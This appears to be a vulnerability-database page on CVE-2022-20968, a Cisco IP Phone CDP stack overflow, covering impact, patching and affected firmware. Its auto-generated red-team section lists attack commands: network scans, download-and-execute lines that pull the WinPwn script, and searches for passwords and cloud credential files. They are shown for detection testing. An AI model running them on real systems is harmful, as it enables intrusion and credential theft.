CVE-2022-20968
Overview
This vulnerability is a stack-based buffer overflow caused by insufficient input validation in the Cisco Discovery Protocol (CDP) processing feature within Cisco IP Phone 7800 and 8800 Series firmware. Specifically, malformed CDP packets are not properly checked before being processed, leading to memory corruption in the affected device's firmware. The flaw resides in the handling of received CDP packets, allowing crafted traffic to trigger the overflow condition.
Vulnerability Description
A vulnerability in the Cisco Discovery Protocol processing feature of Cisco IP Phone 7800 and 8800 Series firmware could allow an unauthenticated, adjacent attacker to cause a stack overflow on an affected device. This vulnerability is due to insufficient input validation of received Cisco Discovery Protocol packets. An attacker could exploit this vulnerability by sending crafted Cisco Discovery Protocol traffic to an affected device. A successful exploit could allow the attacker to cause a stack overflow, resulting in possible remote code execution or a denial of service (DoS) condition on an affected device.
Impact
An unauthenticated attacker with adjacent network access can exploit this flaw to cause a stack overflow, potentially leading to remote code execution or denial of service conditions on affected Cisco IP Phones. Because no authentication or user interaction is required (CVSS vector AV:A/AC:L/PR:N/UI:N), an attacker can disrupt telephony services or gain control over the device, affecting business communications and operational continuity.
Solution
Cisco has released firmware updates addressing this vulnerability for the IP Phone 7800 and 8800 Series, specifically versions later than 9.3(4)sr3. Administrators should apply the patches as detailed in Cisco Security Advisory cisco-sa-ipp-oobwrite-8cMF5r7U available at https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ipp-oobwrite-8cMF5r7U. Upgrading to the fixed firmware versions eliminates the insufficient input validation in CDP packet processing.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
A critical vulnerability exists within the Cisco Discovery Protocol (CDP) processing feature of specific firmware versions for Cisco IP Phone 7800 and 8800 Series devices. This vulnerability arises from inadequate input validation of CDP packets, which can lead to a stack overflow condition. When an affected device receives specially crafted CDP traffic, it can cause the device to crash or potentially allow an attacker to execute arbitrary code. The implications of this vulnerability are significant, given that it allows unauthenticated, adjacent attackers to exploit the flaw without requiring any prior access to the network or device.
Exploitation of this vulnerability can occur through various attack vectors. An attacker could send malicious CDP packets to an affected device within the same local network segment. This makes the attack particularly concerning for environments where these IP phones are deployed, as they are often used in corporate settings where sensitive communications occur. The attacker’s ability to execute code remotely could lead to unauthorized access to sensitive data, manipulation of device settings, or even the deployment of malware across the network. Additionally, a successful exploit could result in a denial of service (DoS), disrupting communication services and impacting business operations.
The real-world impact of this vulnerability can be severe, particularly for organizations that rely heavily on Cisco IP phones for communication. A successful attack could lead to significant downtime, loss of productivity, and potential data breaches. The business risks associated with such an incident include financial losses, reputational damage, and regulatory penalties, especially if sensitive information is compromised. Organizations must recognize that the consequences of failing to address this vulnerability extend beyond immediate operational disruptions; they can also affect customer trust and long-term business viability.
To detect and mitigate this vulnerability, organizations should implement a multi-layered security approach. Regularly updating firmware to the latest versions provided by Cisco is essential, as these updates often include patches for known vulnerabilities. Network segmentation can also be employed to limit the exposure of IP phones to potential attackers, ensuring that only authorized devices can communicate with them. Monitoring network traffic for unusual CDP packets can help in early detection of exploitation attempts. Additionally, employing intrusion detection systems (IDS) can provide alerts on suspicious activities related to CDP traffic, allowing for timely responses to potential threats.
In conclusion, the vulnerability within the CDP processing feature of Cisco IP Phone 7800 and 8800 Series firmware presents a significant risk to organizations that utilize these devices. The potential for remote code execution and denial of service underscores the necessity for proactive security measures. By adopting robust detection and mitigation strategies, organizations can safeguard their communication infrastructure and protect against the adverse effects of this vulnerability. The importance of maintaining up-to-date firmware and employing network security best practices cannot be overstated in the current threat landscape.
Affected Products (702)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Cisco | Ip Phone 7811 Firmware | 9.3\(3\) |
cpe:2.3:o:cisco:ip_phone_7811_firmware:9.3\(3\):*:*:*:*:*:*:*
|
|
|
Cisco | Ip Phone 7811 Firmware | 9.3\(4\) |
cpe:2.3:o:cisco:ip_phone_7811_firmware:9.3\(4\):*:*:*:*:*:*:*
|
|
|
Cisco | Ip Phone 7811 Firmware | 9.3\(4\)sr1 |
cpe:2.3:o:cisco:ip_phone_7811_firmware:9.3\(4\)sr1:*:*:*:*:*:*:*
|
|
|
Cisco | Ip Phone 7811 Firmware | 9.3\(4\)sr2 |
cpe:2.3:o:cisco:ip_phone_7811_firmware:9.3\(4\)sr2:*:*:*:*:*:*:*
|
|
|
Cisco | Ip Phone 7811 Firmware | 9.3\(4\)sr3 |
cpe:2.3:o:cisco:ip_phone_7811_firmware:9.3\(4\)sr3:*:*:*:*:*:*:*
|
|
|
Cisco | Ip Phone 7811 Firmware | 10.1\(1\)sr1 |
cpe:2.3:o:cisco:ip_phone_7811_firmware:10.1\(1\)sr1:*:*:*:*:*:*:*
|
|
|
Cisco | Ip Phone 7811 Firmware | 10.1\(1\)sr2 |
cpe:2.3:o:cisco:ip_phone_7811_firmware:10.1\(1\)sr2:*:*:*:*:*:*:*
|
|
|
Cisco | Ip Phone 7811 Firmware | 10.1\(1.9\) |
cpe:2.3:o:cisco:ip_phone_7811_firmware:10.1\(1.9\):*:*:*:*:*:*:*
|
|
|
Cisco | Ip Phone 7811 Firmware | 10.2\(1\) |
cpe:2.3:o:cisco:ip_phone_7811_firmware:10.2\(1\):*:*:*:*:*:*:*
|
|
|
Cisco | Ip Phone 7811 Firmware | 10.2\(1\)sr1 |
cpe:2.3:o:cisco:ip_phone_7811_firmware:10.2\(1\)sr1:*:*:*:*:*:*:*
|
|
|
Cisco | Ip Phone 7811 Firmware | 10.2\(2\) |
cpe:2.3:o:cisco:ip_phone_7811_firmware:10.2\(2\):*:*:*:*:*:*:*
|
|
|
Cisco | Ip Phone 7811 Firmware | 10.3\(1\) |
cpe:2.3:o:cisco:ip_phone_7811_firmware:10.3\(1\):*:*:*:*:*:*:*
|
|
|
Cisco | Ip Phone 7811 Firmware | 10.3\(1\)sr1 |
cpe:2.3:o:cisco:ip_phone_7811_firmware:10.3\(1\)sr1:*:*:*:*:*:*:*
|
|
|
Cisco | Ip Phone 7811 Firmware | 10.3\(1\)sr2 |
cpe:2.3:o:cisco:ip_phone_7811_firmware:10.3\(1\)sr2:*:*:*:*:*:*:*
|
|
|
Cisco | Ip Phone 7811 Firmware | 10.3\(1\)sr3 |
cpe:2.3:o:cisco:ip_phone_7811_firmware:10.3\(1\)sr3:*:*:*:*:*:*:*
|
|
|
Cisco | Ip Phone 7811 Firmware | 10.3\(1\)sr4 |
cpe:2.3:o:cisco:ip_phone_7811_firmware:10.3\(1\)sr4:*:*:*:*:*:*:*
|
|
|
Cisco | Ip Phone 7811 Firmware | 10.3\(1\)sr4b |
cpe:2.3:o:cisco:ip_phone_7811_firmware:10.3\(1\)sr4b:*:*:*:*:*:*:*
|
|
|
Cisco | Ip Phone 7811 Firmware | 10.3\(1\)sr5 |
cpe:2.3:o:cisco:ip_phone_7811_firmware:10.3\(1\)sr5:*:*:*:*:*:*:*
|
|
|
Cisco | Ip Phone 7811 Firmware | 10.3\(1\)sr6 |
cpe:2.3:o:cisco:ip_phone_7811_firmware:10.3\(1\)sr6:*:*:*:*:*:*:*
|
|
|
Cisco | Ip Phone 7811 Firmware | 10.3\(1\)sr7 |
cpe:2.3:o:cisco:ip_phone_7811_firmware:10.3\(1\)sr7:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
0 eventsNo threat activity recorded for this CVE.
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns
No CAPEC pattern mapped to this CVE.
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (2)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2022-20968 |
| sec.cloudapps.cisco.com |
GitHub CVE
|
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ipp-oobwrite-8cMF5r7U |